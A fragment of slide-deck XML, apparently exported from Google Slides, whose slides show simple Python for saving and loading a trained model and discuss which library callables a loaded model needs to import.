              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>    # Read a weights file and return a Tensor</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="694" name="Google Shape;694;p58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6201325" y="3595125"/>
            <a:ext cx="2746500" cy="863700"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B9D8EB"/>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latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>A: We can look at the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>Model</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t> class definition.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>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8" name="Shape 698"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="699" name="Google Shape;699;p59"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="231275" y="1332600"/>
            <a:ext cx="3427500" cy="1477500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F2F2F2"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="accent6"/>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chemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>from lib import Model, train</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>model = Model()</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>train(model, corpus)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>model.save(‘model.bin’)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="700" name="Google Shape;700;p59"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1993550" y="2879550"/>
            <a:ext cx="646200" cy="402300"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="38100">
            <a:solidFill>
              <a:schemeClr val="lt2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="701" name="Google Shape;701;p59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3711800" y="3226200"/>
            <a:ext cx="3188100" cy="1166400"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D9EAD3"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="dk2"/>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b="1" lang="en" sz="1200">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Imports:</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:latin typeface="Inter"/>
              <a:ea typeface="Inter"/>
              <a:cs typeface="Inter"/>
              <a:sym typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Roboto Mono Light"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>lib.Model</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Roboto Mono Light"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>torch.Tensor</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Roboto Mono Light"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>lib.read_weights_from_file</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Roboto Mono Light"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>lib.GradDescent</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="702" name="Google Shape;702;p59"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="0"/>
            <a:ext cx="8514900" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Insight: Libraries Provide Trusted Specifications</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="703" name="Google Shape;703;p59"/>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704" name="Google Shape;704;p59"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5394500" y="1332600"/>
            <a:ext cx="3649500" cy="1046700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt2"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="accent1"/>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rgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t> lib </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>import</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t> Model, train</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>model = Model.load(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="3C78D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>‘model.bin’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>model.predict(input)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="705" name="Google Shape;705;p59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2487991" y="3351301"/>
            <a:ext cx="841200" cy="808800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A4C2F4"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="25475">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="122200" lIns="122200" spcFirstLastPara="1" rIns="122200" wrap="square" tIns="122200">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1871"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="706" name="Google Shape;706;p59"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2487991" y="3351300"/>
            <a:ext cx="840977" cy="808511"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="707" name="Google Shape;707;p59"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2719361" y="3607802"/>
            <a:ext cx="840965" cy="784798"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="708" name="Google Shape;708;p59"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="231275" y="963300"/>
            <a:ext cx="21255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200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Model Saver</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
              <a:ea typeface="Inter"/>
              <a:cs typeface="Inter"/>
              <a:sym typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="709" name="Google Shape;709;p59"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5412875" y="953595"/>
            <a:ext cx="21255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200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Model Loader</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
              <a:ea typeface="Inter"/>
              <a:cs typeface="Inter"/>
              <a:sym typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="710" name="Google Shape;710;p59"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1993550" y="2879550"/>
            <a:ext cx="646200" cy="402300"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="38100">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="711" name="Google Shape;711;p59"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="3445200" y="2562150"/>
            <a:ext cx="1999200" cy="719700"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="38100">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="712" name="Google Shape;712;p59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6201325" y="2604525"/>
            <a:ext cx="2746500" cy="863700"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F4CCCC"/>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latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Q: Should a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>Model</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t> need to import these callables?</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="713" name="Google Shape;713;p59"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1100550" y="1603450"/>
            <a:ext cx="4708200" cy="1723800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt2"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="accent1"/>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lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="3C78D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>Model</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
